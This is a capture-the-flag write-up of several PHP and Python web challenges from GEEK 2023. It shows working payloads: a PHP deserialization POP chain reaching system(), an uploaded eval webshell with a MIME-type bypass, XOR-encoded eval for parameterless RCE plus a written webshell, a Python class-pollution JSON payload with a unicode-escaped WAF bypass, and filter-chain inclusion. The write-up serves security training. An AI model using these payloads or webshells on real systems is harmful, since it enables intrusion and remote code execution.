Contents
- EzHttp
- unsign
- n00b_Upload
- easy_php
- EzRce
- ezpython
- ezrfi
EzHttp
Following the hint, send the parameters via POST.
The password turns out to be wrong.
Press F12 and find the hint, which points to
./robots.txt
Visiting it gives the password.
What follows is basic knowledge of HTTP requests:
capture the request and modify it.
Finally,
we simply add the request header O2TAKUXX: GiveMeFlag
and get the flag.
unsign
Source code
<?php
highlight_file(__FILE__);
class syc
{
    public $cuit;
    public function __destruct()        // runs when the object is destroyed
    {
        echo("action!<br>");
        $function = $this->cuit;
        return $function();             // calling a lover object triggers __invoke
    }
}
class lover
{
    public $yxx;
    public $QW;
    public function __invoke()
    {
        echo("invoke!<br>");
        return $this->yxx->QW;          // reading an undefined property triggers __get
    }
}
class web
{
    public $eva1;
    public $interesting;
    public function __get($var)
    {
        echo("get!<br>");
        $eva1 = $this->eva1;
        $eva1($this->interesting);      // arbitrary function call with a controlled argument
    }
}
if (isset($_POST['url']))
{
    unserialize($_POST['url']);
}
?>
POP chain
syc.__destruct -> lover.__invoke() -> web.__get()
Exploit (payload generator)
<?php
class syc
{
    public $cuit;
}
class lover
{
    public $yxx;
    public $QW;
}
class web
{
    public $eva1;
    public $interesting;
}
$a = new syc();
$b = new lover();
$c = new web();
$a->cuit = $b;                 // __destruct calls $b(), i.e. lover::__invoke
$b->yxx = $c;                  // __invoke reads $c->QW, i.e. web::__get
$c->eva1 = 'system';
$c->interesting = 'cat /flag';
echo serialize($a);
?>
Submit the serialized payload and get the flag.
n00b_Upload
The challenge does not check the file name, so the extension can be php.
It then checks the MIME type; we only need to change it to image/jpeg.
The file content is checked for the usual one-line webshell, so it has to be rewritten with the PHP short tag.
Create 1.php and write:
<?=@eval($_POST['shell']);?>
Capture the request with Burp, change the MIME type, and the upload succeeds.
Visit the file, execute commands and get the flag.
easy_php
Key points: newline bypass, intval() bypass, sha1() bypass, PHP parameter-name parsing quirk
Source code
<?php
header('Content-type:text/html;charset=utf-8');
error_reporting(0);
highlight_file(__FILE__);
include_once('flag.php');
if (isset($_GET['syc']) && preg_match('/^Welcome to GEEK 2023!$/i', $_GET['syc']) && $_GET['syc'] !== 'Welcome to GEEK 2023!') {
    if (intval($_GET['lover']) < 2023 && intval($_GET['lover'] + 1) > 2024) {
        if (isset($_POST['qw']) && $_POST['yxx']) {
            $array1 = (string)$_POST['qw'];
            $array2 = (string)$_POST['yxx'];
            if (sha1($array1) === sha1($array2)) {
                if (isset($_POST['SYC_GEEK.2023']) && ($_POST['SYC_GEEK.2023'] = "Happy to see you!")) {
                    echo $flag;
                } else {
                    echo "再繞最后一步吧";
                }
            } else {
                echo "好哩,快拿到flag啦";
            }
        } else {
            echo "這里繞不過去,QW可不答應了哈";
        }
    } else {
        echo "嘿嘿嘿,你別急啊";
    }
} else {
    echo "不會吧不會吧,不會第一步就卡住了吧,yxx會瞧不起你的!";
}
?>
Analysis
Use a newline (%0a) to bypass preg_match(): $ also matches just before a trailing newline, while the strict comparison with the original string still fails. Use arrays to bypass sha1(), since both values are cast to the string "Array". Use scientific notation to bypass intval(). Finally, a PHP parsing quirk: a [ in the parameter name is parsed into an underscore.
Get the flag.
EzRce
Key points: XOR bypass, parameterless RCE
The source is as follows
<?php
include('waf.php');
session_start();
show_source(__FILE__);
error_reporting(0);
$data = $_GET['data'];
if (waf($data)) {
    eval($data);
} else {
    echo "no!";
}
?>
The challenge filters letters and digits, so it is meant to be parameterless RCE, but eval itself is not filtered.
Bypass the filter with XOR and construct:
eval(next(getallheaders()));
The permissions are insufficient, so we write a webshell and connect with AntSword:
file_put_contents('shell.php','<?php eval($_POST[1]);?>');
Checking the permissions, we find only r (read).
Then use the find command to look for something usable; find itself is available, and we get the flag.
ezpython
Key point: Python prototype-chain (class attribute) pollution
Source code
import json
import os
from waf import waf
import importlib
from flask import Flask, render_template, request, redirect, url_for, session, render_template_string

app = Flask(__name__)
app.secret_key = 'jjjjggggggreekchallenge202333333'


class User():
    def __init__(self):
        self.username = ""
        self.password = ""
        self.isvip = False


class hhh(User):
    def __init__(self):
        self.username = ""
        self.password = ""


registered_users = []


@app.route('/')
def hello_world():  # put application's code here
    return render_template("welcome.html")


@app.route('/play')
def play():
    username = session.get('username')
    if username:
        return render_template('index.html', name=username)
    else:
        return redirect(url_for('login'))


@app.route('/login', methods=['GET', 'POST'])
def login():
    if request.method == 'POST':
        username = request.form.get('username')
        password = request.form.get('password')
        user = next((user for user in registered_users if user.username == username and user.password == password), None)
        if user:
            session['username'] = user.username
            session['password'] = user.password
            return redirect(url_for('play'))
        else:
            return "Invalid login"
        return redirect(url_for('play'))
    return render_template("login.html")


@app.route('/register', methods=['GET', 'POST'])
def register():
    if request.method == 'POST':
        try:
            if waf(request.data):
                return "fuck payload!Hacker!!!"
            data = json.loads(request.data)
            if "username" not in data or "password" not in data:
                return "連用戶名密碼都沒有你注冊啥呢"
            user = hhh()
            merge(data, user)
            registered_users.append(user)
        except Exception as e:
            return "泰酷辣,沒有注冊成功捏"
        return redirect(url_for('login'))
    else:
        return render_template("register.html")


@app.route('/flag', methods=['GET'])
def flag():
    user = next((user for user in registered_users if user.username == session['username'] and user.password == session['password']), None)
    if user:
        if user.isvip:
            data = request.args.get('num')
            if data:
                if '0' not in data and data != "123456789" and int(data) == 123456789 and len(data) <= 10:
                    flag = os.environ.get('geek_flag')
                    return render_template('flag.html', flag=flag)
                else:
                    return "你的數字不對哦!"
            else:
                return "I need a num!!!"
        else:
            return render_template_string('這種神功你不充VIP也想學?<p><img src="{{url_for(\'static\',filename=\'weixin.png\')}}">要不v我50,我送你一個VIP吧,嘻嘻</p>')
    else:
        return "先登錄去"


def merge(src, dst):
    for k, v in src.items():
        if hasattr(dst, '__getitem__'):
            if dst.get(k) and type(v) == dict:
                merge(v, dst.get(k))
            else:
                dst[k] = v
        elif hasattr(dst, k) and type(v) == dict:
            merge(v, getattr(dst, k))
        else:
            setattr(dst, k, v)


if __name__ == '__main__':
    app.run(host="0.0.0.0", port="8888")
First a User class is defined with three attributes, isvip being False; the subclass hhh inherits from User but only has two attributes. Next is the /register
route: it instantiates hhh(), so isvip cannot be set directly, and then calls merge(). The /login
route implements the login. Then look at the key /flag
route: it checks whether user.isvip is true, takes the num parameter, and returns the flag if the if-check passes. Finally, the presence of merge() points to prototype-chain pollution.
We send the following JSON data with Postman
(__base__
is used to reach the parent class User and pollute its isvip)
{"username":"1","password":"1","__class__":{"__base__":{"isvip":true}}
}
(Later, reading other writeups, I found that polluting the attribute directly also works, without going through the magic attributes.)
There is a filter, so just Unicode-escape the key
{"username":"1","password":"1","__class__":{"__base__":{"isvi\u0070":true}}
}
After logging in, the 九幽玄天神功 page is already asking you to pass a parameter.
Just pass +123456789
to bypass the check: int() accepts the leading plus sign, the string is not equal to "123456789", and it is exactly 10 characters long.
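To show the defensive side of the merge() weakness above, here is an added example (my own code, not part of the challenge or of the original writeup): the challenge's User, hhh and merge are reproduced next to an allowlisting safe_merge, and a hypothetical substring filter naive_waf stands in for the unknown waf.py. register() shows that a filter on the raw body is bypassed by JSON \u escapes, because json.loads decodes them afterwards, while an allowlist applied to the decoded keys blocks both payloads.

```python
import json
# User, hhh and merge are copied from the challenge source above; the rest is added.
class User:
    def __init__(self):
        self.username = ""
        self.password = ""
        self.isvip = False

class hhh(User):
    def __init__(self):
        self.username = ""
        self.password = ""

def merge(src, dst):  # vulnerable: follows __class__/__base__ and sets any attribute
    for k, v in src.items():
        if hasattr(dst, '__getitem__'):
            if dst.get(k) and type(v) == dict:
                merge(v, dst.get(k))
            else:
                dst[k] = v
        elif hasattr(dst, k) and type(v) == dict:
            merge(v, getattr(dst, k))
        else:
            setattr(dst, k, v)

ALLOWED_FIELDS = {"username", "password"}
def safe_merge(src, dst):  # hardened: allowlisted string fields only, no recursion
    for k, v in src.items():
        if k not in ALLOWED_FIELDS or not isinstance(v, str):
            raise ValueError(f"rejected field {k!r}")
        setattr(dst, k, v)

def naive_waf(raw):  # hypothetical substring filter on the raw body (assumption)
    return any(bad in raw for bad in ("isvip", "__class__", "__base__"))
def register(raw, merge_fn, waf=naive_waf):
    """Returns (accepted, polluted); polluted means a fresh hhh() now reads as VIP."""
    if "isvip" in vars(User):
        delattr(User, "isvip")  # clear class-level state left by an earlier run
    if waf(raw):
        return False, False
    data = json.loads(raw)  # \uXXXX escapes are decoded only here, after the WAF ran
    try:
        merge_fn(data, hhh())
    except ValueError:
        return False, False
    return True, getattr(hhh(), "isvip", False)  # unpolluted hhh has no isvip at all
# Constructed payloads: plain pollution, and the same keys hidden behind JSON escapes.
PLAIN = '{"username":"1","password":"1","__class__":{"__base__":{"isvip":true}}}'
ESCAPED = '{"username":"1","password":"1","__cl\\u0061ss__":{"__b\\u0061se__":{"isvi\\u0070":true}}}'
```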
ezrfi
Key point: filter chain attack
Opening the challenge, it hints at hint.py.
After some testing, the file inclusion turns out to append a .py
suffix.
Then decode step by step: first base64, which yields 尊嘟假嘟.
Decoding further reveals RC4 encryption with the key Syclover.
Clearly a filter chain is needed to bypass this.
(Note that the length of the constructed command must be a multiple of 3 so the base64 encoding does not break; if it is too short, pad it manually with a.)
List the root directory
and get the flag.